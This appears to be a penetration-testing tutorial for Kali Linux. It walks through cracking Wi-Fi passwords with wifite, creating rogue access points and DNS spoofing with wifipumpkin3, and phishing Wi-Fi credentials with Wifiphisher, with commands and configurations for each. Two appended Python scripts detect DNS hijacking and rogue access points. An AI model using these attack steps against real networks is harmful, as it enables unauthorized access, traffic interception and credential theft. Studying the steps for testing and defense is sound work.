Preparation

External network card: netcore NW392

Chip Information

This device currently requires manual driver installation

Code:

apt install realtek-rtl88xxau-dkms   # enter y when prompted to continue the installation

Note: Depending on network speed, the installation may sit at 69% and 85% progress for some time

Installation is complete, reboot

Wireless network card status query

iwconfig //View wireless information

Mode:Monitor means the card can listen to the communication of nearby wireless devices

Mode:Managed means the card can connect to nearby wireless devices

Change the working mode of the NIC: iwconfig <NIC name> mode <working mode>

Examples of common modes for testing are as follows

Code:

iwconfig wlan0 mode Managed
iwconfig wlan0 mode Monitor

Practical explanation

Cracking WIFI password, using wifite tool for testing

New version of wifite: https://github.com/kimocoder/wifite2

Installation and startup method.

Code:

$ git clone https://github.com/kimocoder/wifite2.git
$ cd wifite2
$ pip3 install -r requirements.txt   # install dependencies; normally not needed on Kali (dependencies are already satisfied)
$ sudo ./wifite.py                   # run from the cloned folder
$ sudo python3 setup.py install      # optional: install to the system

Note: The wifite version currently built into Kali is older than the one on GitHub (root privileges are required to run the wifite command for attack operations)

Run with the -h argument to display wifite help information

Run with the -h -v parameters to display more help information

This output shows the default save path of the password wordlist

GitHub version: wordlist-probable.txt in the current path

Kali: /usr/share/dict/wordlist-probable.txt

  • Default attack method.
    Run wifite with root privileges without parameters

wifite detects the wireless card of the running device and changes its mode to monitor (to detect nearby WIFI communication)

It then automatically scans for nearby WIFI devices until you press Ctrl+c to pause

Enter Ctrl+c to pause the scan and enter the corresponding parameters according to the purpose of the test to start WIFI password cracking

Crack the specified device: enter the number shown for the corresponding WiFi in the list

All devices: input “all” parameter

  • Attack the specified device.
    You can use the -e parameter plus the device essid information to specify the operation

  • Commonly used combination of parameters explained.
    Note: Here is the command executed under the path of wifite folder

sudo ./wifite.py --kill -i wlan0 -mac -pow 50 --dict /password.txt

This kills processes that conflict with the wlan0 NIC, enables MAC address randomization, and then attacks WIFI devices with a signal strength greater than or equal to 50 using the specified dictionary

Spoofing attack, use wifipumpkin3 tool for testing

GitHub: https://github.com/P0cL4bs/wifipumpkin3

Online installation manual: https://wifipumpkin3.github.io/docs/getting-started#installation

Example installation on a kali system

Code:

sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

Note: scapy warning issue

Update scapy version

https://github.com/secdev/scapy

  • Create a WiFi
    Code:
set interface wlan0
# Set the name of the access point to be created
set ssid TestWIFI
# Set the noproxy plugin
set proxy noproxy
# Ignore all logs from the pydns_server
ignore pydns_server
start

# pumpkinproxy - Proxy for intercepting network traffic for the TCP protocol.
# captiveflask - Blocks users from accessing the internet until they open a login page.
# noproxy - Runs proxy-less redirected traffic

Search for the created wifi

Visit the test URL and enter an account name and password to log in and test

http://testphp.vulnweb.com/login.php

  • Convenient startup script
    Save the commands from the previous test to a file with the .pulp suffix

Load it with the --pulp parameter

  • Proxy mode settings

Default pumpkinproxy // proxy available for intercept mode

Turn on the proxy plugin

Turn off the proxy plugin

captiveflask proxy mode //specific page that pops up after connecting to WIFI

Captured submissions

  • DNS hijacking
    Code:
set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start
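
Seen from a client on the test network, the redirection configured above shows up as a public name answering with a private address. The following added example (not from the original article) checks resolver answers for that pattern; the baseline answers, the internal suffix list and all names other than wifitest.com are constructed assumptions.

```python
import ipaddress

# RFC 1918, loopback and link-local ranges: a public name should not resolve here.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# Assumption: suffixes used for internal names on the network being checked.
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")

def is_non_routable(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in NON_ROUTABLE)

def check_answers(observed, baseline):
    """Compare answers from the resolver handed out by the Wi-Fi (observed)
    with answers from a resolver you trust (baseline); return findings."""
    findings = []
    for domain in sorted(observed):
        name = domain.rstrip(".").lower()
        if name.endswith(INTERNAL_SUFFIXES):
            continue  # internal names may legitimately use private space
        trusted = set(baseline.get(name, []))
        for addr in observed[domain]:
            if is_non_routable(addr):
                findings.append((name, addr, "public name resolves to non-routable address"))
            elif trusted and addr not in trusted:
                # Weaker signal: CDNs rotate addresses, so review rather than alert.
                findings.append((name, addr, "differs from trusted resolver"))
    return findings

# Constructed sample data. wifitest.com and 192.168.70.133 are the values used in
# the article; every other name and address is made up (documentation ranges).
OBSERVED = {
    "wifitest.com": ["192.168.70.133"],
    "example.org": ["203.0.113.10"],
    "printer.lan": ["192.168.70.20"],
    "example.net": ["198.51.100.7"],
}
BASELINE = {
    "wifitest.com": ["198.51.100.25"],
    "example.org": ["203.0.113.10"],
    "example.net": ["198.51.100.8"],
}

if __name__ == "__main__":
    for name, addr, reason in check_answers(OBSERVED, BASELINE):
        print(f"{name} -> {addr}: {reason}")
```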

  • Other common command parameters
    show //Show available attack modules

jobs //Display the attack module running in the background

ap //Display information about the created WIFI

proxies //show available proxy modes and functions

security //WIFI security mode, you can set the password and protection method

Change password

Phishing attack, use Wifiphisher tool to test

GitHub: https://github.com/wifiphisher/wifiphisher

Note: Two wireless devices are required

Automatically scan for nearby WIFI devices

Select the target you want to test and press Enter to confirm; here the verify spoofing mode is selected for demonstration

1 - Network Manager Connect

Generate the WIFI that needs to be authenticated

The tool interferes with the normal WIFI so that clients automatically connect to the generated WIFI

Display the attack

ESC exits and the captured input is displayed in the terminal
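
On the defending side, a generated network that reuses a known SSID can be spotted by comparing scan results with an inventory of the legitimate access points. The following is an added example, not part of the original article or of any tool it describes; the SSID, BSSIDs, security labels and scan records are constructed assumptions.

```python
# Assumption: inventory of the legitimate access points (constructed values).
KNOWN_APS = {
    "OfficeWIFI": {"bssids": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
                   "security": "WPA2"},
}

def find_suspect_aps(scan, known=KNOWN_APS):
    """Return (ssid, bssid, reasons) for beacons that reuse a known SSID
    but do not match the recorded BSSIDs or security mode."""
    findings = []
    for ap in scan:
        ref = known.get(ap["ssid"])
        if ref is None:
            continue  # SSID is not one we are responsible for
        bssid = ap["bssid"].lower()
        reasons = []
        if bssid not in ref["bssids"]:
            reasons.append("unknown BSSID")
        # A BSSID can be copied, so the security mode is checked independently.
        if ap["security"] != ref["security"]:
            reasons.append(f"security is {ap['security']} instead of {ref['security']}")
        if reasons:
            findings.append((ap["ssid"], bssid, ", ".join(reasons)))
    return findings

# Constructed scan results, as a wireless survey tool might report them.
SCAN = [
    {"ssid": "OfficeWIFI", "bssid": "AA:BB:CC:00:00:01", "security": "WPA2"},
    {"ssid": "OfficeWIFI", "bssid": "02:11:22:33:44:55", "security": "Open"},
    {"ssid": "CafeGuest",  "bssid": "02:aa:aa:aa:aa:aa", "security": "Open"},
    {"ssid": "OfficeWIFI", "bssid": "AA:BB:CC:00:00:02", "security": "Open"},
]

if __name__ == "__main__":
    for ssid, bssid, reasons in find_suspect_aps(SCAN):
        print(f"{ssid} [{bssid}]: {reasons}")
```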
